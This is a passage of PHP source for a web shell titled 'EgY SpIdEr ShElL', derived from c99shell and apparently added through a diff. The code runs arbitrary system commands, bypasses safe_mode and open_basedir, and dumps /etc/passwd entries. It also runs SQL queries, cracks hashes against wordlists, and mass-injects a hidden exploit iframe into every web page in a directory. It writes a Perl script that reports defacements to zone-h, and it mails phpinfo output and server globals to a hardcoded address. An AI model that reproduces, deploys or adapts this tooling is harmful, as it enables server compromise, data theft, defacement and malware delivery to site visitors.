or use _GET _POST +$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp + + +$temp=tempnam($tymczas, "cx"); + +if(copy("compress.zlib://".$snn, $temp)){ +$zrodlo = fopen($temp, "r"); +$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo); +echo "".htmlspecialchars($tekst).""; +unlink($temp); +echo "</textarea></CENTER>"; +} +break; +case 'ini_restore': + if(empty($_POST['ini_restore'])){ +} else { + +$ini=$_POST['ini_restore']; +echo ini_get("safe_mode"); +echo ini_get("open_basedir"); +require_once("$ini"); +ini_restore("safe_mode"); +ini_restore("open_basedir"); +echo ini_get("safe_mode"); +echo ini_get("open_basedir"); +include($_GET["egy"]); +echo "</textarea></CENTER>"; +} +break; +case 'glob': +function reg_glob() +{ +$chemin=$_REQUEST['glob']; +$files = glob("$chemin*"); + + +foreach ($files as $filename) { + + echo "$filename\n"; + +} +} + +if(isset($_REQUEST['glob'])) +{ +reg_glob(); +} + +break; + case 'sym1': + if(empty($_POST['sym1p'])){ + } else { +$symp=$_POST['sym1p']; + } + if(empty($_POST['sym1p2'])){ + +} else { +$symp2=$_POST['sym1p2']; + + symlink("a/a/a/a/a/a/", "dummy"); +symlink("dummy".$symp2."".$symp."", "xxx"); +unlink("dummy"); +while (1) { +symlink(".", "dummy"); + + } + } + break; + case 'sym2': + @include(xxx); + + break; + case 'plugin': + if ($_POST['plugin'] ){ + + + for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd + $ara = posix_getpwuid($uid); + if (!empty($ara)) { + while (list ($key, $val) = each($ara)){ + print "$val:"; + } + print "\n"; + } + } + echo "</textarea>"; + } + + } + } + } +if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if($file=moreread($_POST['d_name'])){ $filedump = $file; } + else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; } + if(!empty($_POST['cmd'])) + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $content_encoding=$mime_type=''; + 
compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); } +if (isset($_POST['cmd']) && $_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + echo '<body bgcolor=#e4e0d8>'; + if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." 
: ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; + switch($sql->query($query)) + { + case '0': + echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; + break; + case '1': + if($sql->get_result()) + { + echo "<table width=100%>"; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", $sql->columns); + echo "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); + echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; + } + echo "</table>"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; + break; + } + } + } + } + } + echo "<br><form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center>"; + echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; + echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div 
align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['12'])) + { + @unlink(__FILE__); + } +if(isset($_GET['11'])) + { + @unlink($tempdir.'bdpl'); + @unlink($tempdir.'back'); + @unlink($tempdir.'bd'); + @unlink($tempdir.'bd.c'); + @unlink($tempdir.'dp'); + @unlink($tempdir.'dpc'); + @unlink($tempdir.'dpc.c'); + @unlink($tempdir.'prxpl'); + @unlink($tempdir.'grep.txt'); + } +if(isset($_GET['2'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; 
+die(); +} +if(isset($_GET['3'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['4'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; + die(); + } + + + + + if(isset($_GET['tool'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); } + if(isset($_GET['tools'])) { 
/*########################################### +code 2 +###########################################*/ +?> +<html> +<head><title>EgY SpIdEr ShElL</title></head> +<STYLE> + +BODY + { + SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456 +} + +table { +BORDER: #eeeeee outset; +BACKGROUND-COLOR: #000000; +color: #dadada; +} +input { +BORDER-RIGHT: #00FF00 1 solid; +BORDER-TOP: #00FF00 1 solid; +BORDER-LEFT: #00FF00 1 solid; +BORDER-BOTTOM: #00FF00 1 solid; +BACKGROUND-COLOR: #333333; +font: 9pt tahoma; +color: #ffffff; +} + +submit { +BORDER: buttonhighlight 1 outset; +BACKGROUND-COLOR: #272727; +width: 40%; +color: #dadada; +} +textarea { +BORDER-RIGHT: #ffffff 1 solid; +BORDER-TOP: #999999 1 solid; +BORDER-LEFT: #999999 1 solid; +BORDER-BOTTOM: #ffffff 1 solid; +BACKGROUND-COLOR: #333333; +font: Fixedsys bold; +color: #ffffff; +} +BODY { +margin: 1; +color: #dadada; +background-color: #000000; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} + +</STYLE> +</body> +</html> +<? 
+$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd(); +$sf="<form method=post>";$ef="</form>"; +$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>"; +$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">"; +$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>"; +$sta="<textarea cols=157 rows=23>";$eta="</textarea>"; +$sfnt="<font face=tahoma size=2 color=#008080>";$efnt="</font>"; +error_reporting(0); +set_magic_quotes_runtime(0); + +if(version_compare(phpversion(), '4.1.0') == -1) + {$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"]; +if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);} +elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;} +else{return $requ."?".$link."=".$val;}} +function delm($delmtxt){print"<center><table bgcolor=black style='border:1px solid olive' width=99% height=2%>";print"<tr><td><b><center><font size=2 color=olive>$delmtxt</td></tr></table></center>";} +function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd); +$nscmd=htmlspecialchars($scmd);print $nscmd;} +elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd); +$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;} +elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r"); +while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));; +print $res;}pclose($pcmd);}elseif(!function_exists(popen)){ +ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){ +ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean(); +print 
htmlspecialchars($pret);}} +function input($type,$name,$value,$size) +{if (empty($value)){print "<input type=$type name=$name size=$size>";} +elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";} +elseif(empty($size)){print "<input type=$type name=$name value=$value >";} +else {print "<input type=$type name=$name value=$value size=$size >";}} +function permcol($path){if (is_writable($path)){print "<font color=olive>"; +callperms($path); print "</font>";} +elseif (!is_readable($path)&&!is_writable($path)){print "<font color=red>"; +callperms($path); print "</font>";} +else {print "<font color=white>";callperms($path);}} +if ($dlink=="dwld"){download($_REQUEST['dwld']);} +function download($dwfile) {$size = filesize($dwfile); +@header("Content-Type: application/force-download;name=$dwfile"); +@header("Content-Transfer-Encoding: binary"); +@header("Content-Length: $size"); +@header("Content-Disposition: attachment; filename=$dwfile"); +@header("Expires: 0"); +@header("Cache-Control: no-cache, must-revalidate"); +@header("Pragma: no-cache"); +@readfile($dwfile); exit;} +?> +<? 
+$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
+
+$sf="<form method=post>";$ef="</form>";
+$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
+$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
+$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
+$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
+$sfnt="<font face=tahoma size=2 color=olive>";$efnt="</font>";
+################# Ending of common variables ########################
+
+print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=white size=4>
+</font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
+print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "";
+
+if ($act == 'encoder')
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+ echo $v." 
- <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
+ echo "<center>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+ $debase64 = base64_decode($encoder_input);
+ $debase64 = str_replace("\0","[0]",$debase64);
+ $a = explode("\r\n",$debase64);
+ $rows = count($a);
+ $debase64 = htmlspecialchars($debase64);
+ if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+ else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+ echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
+ }
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+ $hex = dechex(ord($encoder_input[$i]));
+ if ($encoder_input[$i] == 
"&") {echo $encoder_input[$i];}
+ elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></form>";
+
+?>
+</center>
+<br><br>
+<table border=0 align=center cellpadding=4>
+<tr><td>
+<center><b>Search milw0rm for MD5 hash</b></center>
+</td><td>
+<center><b>Search md5encryption.com for MD5 or SHA1 hash</b></center>
+</td><td>
+<center><b>Search CsTeam for MD5 hash</b></center>
+</td></tr>
+<tr><td>
+<center>
+<form target="_blank" action="http://www.milw0rm.com/cracker/search.php" method=POST>
+<input type=text size=40 name=hash> <input type=submit value="Submit"></form>
+</center>
+</td><td>
+<center>
+<form target="_blank" action="http://www.md5encryption.com/?mod=decrypt" method=POST>
+<input type=text size=40 name=hash2word> <input type=submit value="Submit"></form>
+</center>
+</td><td>
+<center>
+<form target="_blank" action="http://www.csthis.com/md5/index.php" method=POST>
+<input type=text size=40 name=h> <input type=submit value="Submit"></form>
+</center>
+</td></tr>
+</table>
+<br>
+<center>
+<?php
+// my wordlist cracker ^_^
+if (isset($_GET['hash']) && isset($_GET['wordlist']) && ($_GET['type'] == 'md5' || $_GET['type'] == 'sha1')) {
+ $type = $_GET['type'];
+ $hash = $_GET['hash'];
+ $count = 1;
+ $wordlist = file($_GET['wordlist']);
+ $words = count($wordlist);
+ foreach ($wordlist as $word) {
+ echo $count.' of '.$words.': '.$word.'<br>';
+ if ($hash == $type(rtrim($word))) {
+ echo '<font color=red>Great success! 
The password is: '.$word.'</font><br>';
+ exit;
+ }
+ ++$count;
+ }
+}
+
+}
+if ($act == 'fsbuff')
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+ if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); }
+ else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+ if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+ $rnd = rand(0,9).rand(0,9).rand(0,9);
+ echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
+if ($act == "feedback")
+{
+ $suppmail = base64_decode("ZWd5X3NwaWRlckBob3RtYWlsLmNvbQ==");
+ if (!empty($submit))
+ {
+ $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+ $body = "egy_spider v.".$shver." 
feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\nE-server: ".htmlspecialchars($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars($_SERVER["SERVER_NAME"])."\n\nIP: ".$REMOTE_ADDR;
+ if (!empty($fdbk_ref))
+ {
+ $tmp = @ob_get_contents();
+ ob_clean();
+ phpinfo();
+ $phpinfo = base64_encode(ob_get_contents());
+ ob_clean();
+ echo $tmp;
+ $body .= "\ni"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+ }
+ mail($suppmail,"egy_spider v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
+ echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+ }
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>If you want to send a request for any help I know I will respond to you in case <br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: Arbic, English.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
+}
+
+if ($act == 'massbrowsersploit') {
+?>
+<b>Mass Code Injection:</b><br><br>
+Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.<br><br>
+<form action="<?php echo $surl; ?>" method=GET>
+<input 
type=hidden name="masssploit" value="goahead">
+<input type=hidden name="act" value="massbrowsersploit">
+<table border=0>
+<tr><td>Dir to inject: </td><td><input type=text size=50 name="pathtomass" value="<?php echo realpath('.'); ?>"> <-- default is dir this shell is in</td></tr>
+<tr><td>Code to inject: </td><td><textarea name="injectthis" cols=50 rows=4><?php echo htmlspecialchars('<IFRAME src="http://www.egyspider.eu" width=0 height=0 frameborder=0></IFRAME>'); ?></textarea> <-- best bet would be to include an invisible iframe of browser exploits</td></tr>
+<tr><td><input type=submit value="Inject Code"></td></tr>
+</table>
+</form>
+<?php
+if ($_GET['masssploit'] == 'goahead') {
+ if (is_dir($_GET['pathtomass'])) {
+ $lolinject = $_GET['injectthis'];
+ foreach (glob($_GET['pathtomass']."/*.php") as $injectj00) {
+ $fp=fopen($injectj00,"a+");
+ if (fputs($fp,$lolinject)){
+ echo $injectj00.' was injected<br>';
+ } else {
+ echo '<font color=red>failed to inject '.$injectj00.'</font>';
+ }
+ }
+ foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) {
+ $fp=fopen($injectj00,"a+");
+ if (fputs($fp,$lolinject)){
+ echo $injectj00.' was injected<br>';
+ } else {
+ echo '<font color=red>failed to inject '.$injectj00.'</font>';
+ }
+ }
+ foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) {
+ $fp=fopen($injectj00,"a+");
+ if (fputs($fp,$lolinject)){
+ echo $injectj00.' was injected<br>';
+ } else {
+ echo '<font color=red>failed to inject '.$injectj00.'</font>';
+ }
+ }
+ } else { //end if inputted dir is real -- if not, show an ugly red error
+ echo '<b><font color=red>'.$_GET['pathtomass'].' 
is not available!</font></b>';
+ } // end if inputted dir is real, for real this time
+} // end if confirmation to mass sploit is go
+} // end if massbrowsersploit is called
+
+
+
+if ($dlink=='showsrc'){
+print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>";
+input ("text","tools&dlink=showsrc","",35);print " ";
+input ("hidden","scdir",$scdir,22);input ("submit","tools&dlink=showsrc","Show-src","");print $ef; die();}if(isset($_REQUEST['tools&dlink=showsrc'])){callshsrc(trim($_REQUEST['showsc']));}
+if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
+{if (touch ($_REQUEST['indx'])==true){
+$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
+fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Edit again</a>
+] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
+if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
+print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
+Your index contents here</textarea></p>";
+input ("text","indx","Index-name",35);print " ";
+input ("submit","qindsub","Create","");print $ef;die();}
+if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
+$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
+if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." 
$efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
+if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
+print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
+Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
+input ("submit","mailsub","Send-mail","");print $ef;die();}
+if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
+function callzone($nscdir){
+if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
+else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
+fwrite ($fpz,"\$arq = @ARGV[0];
+\$grupo = @ARGV[1];
+chomp \$grupo;
+open(a,\"<\$arq\");
+@site = <a>;
+close(a);
+\$b = scalar(@site);
+for(\$a=0;\$a<=\$b;\$a++)
+{chomp \$site[\$a];
+if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
+print \"[+] Sending \$site[\$a]\n\";
+use IO::Socket::INET;
+\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
+print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
+print \$sock \"Accept: */*\r\n\";
+print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
+print \$sock \"Accept-Language: pt-br\r\n\";
+print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
+print \$sock \"Connection: Keep-Alive\r\n\";
+print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
+print \$sock \"Host: old.zone-h.org\r\n\";
+print \$sock \"Content-Length: 385\r\n\";
+print \$sock \"Pragma: no-cache\r\n\";
+print \$sock \"\r\n\";
+print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";
+close(\$sock);}");
+if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite 
($fpl,$_REQUEST['zonetxt']);
+}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
+if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
+{print "[ Can't complete the operation !! ]";}
+else {callfuncs("chmod 777 $zpl;chmod 777 $li");
+ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
+print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
+}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
+print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
+www.site1.com
+www.site2.com
+</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
+input ("submit","zonesub","Send","");print $ef;die();}
+print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
+function inisaf($iniv) { $chkini=ini_get($iniv);
+if(($chkini || strtolower($chkini)) !=='on'){print"<font color=olive><b>OFF ( Not secured )</b></font>";} else{
+print"<font color=red><b>ON ( Secured )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
+if ($chkin==""){print " <font color=red><b>None</b></font>";}
+else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=olive>".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
+elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
+while (!feof($opop)){ $nval= fgetc($opop);}}
+elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
+ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
